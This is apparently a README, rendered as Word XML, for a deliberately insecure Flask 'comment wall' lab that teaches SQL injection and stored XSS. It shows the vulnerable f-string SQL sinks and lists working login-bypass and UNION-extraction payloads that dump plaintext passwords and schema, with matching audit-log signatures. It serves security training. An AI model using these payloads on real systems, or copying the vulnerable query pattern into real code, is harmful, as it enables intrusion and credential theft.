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Xcfb48ba0df68102b9715aa2124346c5c4be5f12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerable Comment Wall — SQLi / XSS Training Lab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Intentionally insecure.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Localhost only. Never expose this app to a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">network you don’t own. Every endpoint contains deliberate vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A small, standalone web app built as a hands-on lab for SQL injection,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stored XSS, plaintext password storage, and audit-log forensics. Same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">category as DVWA / OWASP Juice Shop / WebGoat, but lighter — under 350 lines</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of Python plus a vanilla-JS single-page frontend — and aimed at a single</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">60–90 minute training session.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4d00698a4d72e70bbb1f796289481865ef6f948">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">What the app does</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xd46b6b0311b019f0f3493f005bce58d12055e7e">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">How it works (architecture)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xa4379fc9b0eb93726c24bb430a8b64e9f2f2dcb">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X4d4ba783bc939c0c849b4abaea28f72fc17f720">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Audit logging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X54f0903973a5ff3a42f822f05d8f7bedd749df8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Deploying on another machine</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X9ac74d74b37f438b7173c69034324d51443e592">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Running a training session</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xd4acc100dd7517f6e4efd65e82f0b3cd4943d10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">File layout</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xbf72a4043fb0d3eea8828c897b66938d6230cf3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Mitigations to discuss after the demo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what-the-app-does"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. What the app does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“comment wall”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— a Twitter-lite — with three user-facing features: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6"/>
        <w:gridCol w:w="4154"/>
        <w:gridCol w:w="9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an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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Username + password, no email/verification.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/api/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Returns a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“token”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(which is just the username string — see vuln #1).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/api/comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Newest-first, public, no pagination.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/api/comments?q=...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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">LIKE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">search.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a comment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/api/comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requires the login token; body is stored verbatim.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The comment wall is a single page (SPA) with two states: signed-out (login /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">register form visible) and signed-in (post + search + comment list visible).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Below every form there is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">debug box</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that prints the actual SQL the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">server executed for that request — it’s there so trainees can confirm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exactly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payload worked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three users are pre-seeded on first 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alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">password123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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">hunter2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S3cretAdmin!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how-it-works-architecture"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. How it works (architecture)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Browser  ───►  │  Flask (app.py, port 5050)           │  ───► access.log (logfmt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   (SPA)    ◄───  │  ├─ static/index.html, app.js, css   │       (also stdout)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  │  ├─ /api/login, /api/register        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  │  ├─ /api/comments  (GET + POST)      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  │  └─ vuln.db (SQLite, file)  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└──────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="backend-app.py"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backend —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Flask 3.x with three real routes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the four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endpoints, and Flask’s built-in static handler for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SQLite, single file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vuln.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) created and seeded on first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run by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. Two tables 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(id, username, password,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is_admin) and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(id, username, body, created_at).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“Sessions”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">none. Login returns the username as a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; the SPA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stashes it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sends it back in the JSON body of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This is deliberately weak — clients can mint their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">own tokens, and a stored XSS payload reads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Vulnerable SQL is built by f-string concatenation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; safe SQL uses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parameterised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placeholders. Both styles sit side-by-side in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source so trainees can compare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custom logfmt formatter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">log_event(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) writing to a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RotatingFileHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(2 MB × 3 backups, default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and stdout.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="frontend-static"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Frontend —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">static/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markup for both UI states.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app.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— vanilla JS. Uses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for the four API calls and renders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comments via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(deliberately, see vuln #3). Username and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">timestamp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escaped with a small</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">escapeText()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">helper; comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">body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escaped.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style.css</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— dark theme, no framework.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="request-flow-for-a-login"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Request flow for a login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPA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s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{username, password}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JSON to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login()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SELECT ... FROM users WHERE username='X' AND password='Y'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by f-string interpolation and runs it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a row comes back, the response includes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(the username), the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin flag, and the executed SQL (so the debug box can show it).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPA stores the token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switches to the signed-in UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server emits a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login_failure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) audit-log line.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="request-flow-for-a-comment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Request flow for a comment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPA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s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{token, body}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JSON to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/comments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Server uses a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">parameterised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">insert (registration and post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SQLi sinks) and commits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPA reloads the comment list; each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t xml:space="preserve">body is set with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,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so any markup/JS in the body executes for every viewer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server emits a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">comment_posted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">line with a 120-char body preview and an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">xss_suspected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">heuristic flag.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vulnerabilities"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every vuln is wired in on purpose — the source code carries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># VULNERABLE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comments at each sink. The debug box under each form prints the executed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL so trainees can correlate payload → query → result.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="sql-injection-login-bypass-apilogin"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 SQL Injection — login bypass (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/login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id, username, is_admin FROM users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f"WHERE username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AND password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db.execute(query).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(paste into the Username field, password can be anything):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7"/>
        <w:gridCol w:w="46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OR '1'='1' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Logs in as the first row of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(alice).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admin' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Logs in as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without their password.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UNION SELECT 1, 'pwned', 1 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Logs in as a fabricated admin user named</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pwned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the username string is concatenated unescaped into the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL. The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comments out the rest of the query, including the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit log signature:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">event=login_success sqli_suspected=true attempted_user="admin' --" user=admin admin=true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sqli_suspected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag is set whenever the username row that came back doesn’t match the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">username sent.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="X5cb7277344aadf143f64038ecb6dae238f13bcb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 SQL Injection — UNION-based extraction (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/comments?q=...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Sink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list_comments()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"SELECT id, username, body, created_at FROM comments "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f"WHERE body LIKE '%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%' ORDER BY id DESC"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db.execute(query).fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(type into the search box):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%' UNION SELECT id, username, password, '' FROM users--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dumps every plaintext password as a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“comment body”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%' UNION SELECT 1, name, sql, '' FROM sqlite_master--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enumerates tables and their</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE TABLE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">DDL.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%' UNION SELECT 1, sqlite_version(), 'fingerprint', ''--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DB version fingerprint.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clause closes early on the first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">adds rows from any table to the same result set. The four</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">columns must match the four columns the page renders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit log signature:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">event=comment_search sqli_suspected=true q="%' UNION ..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
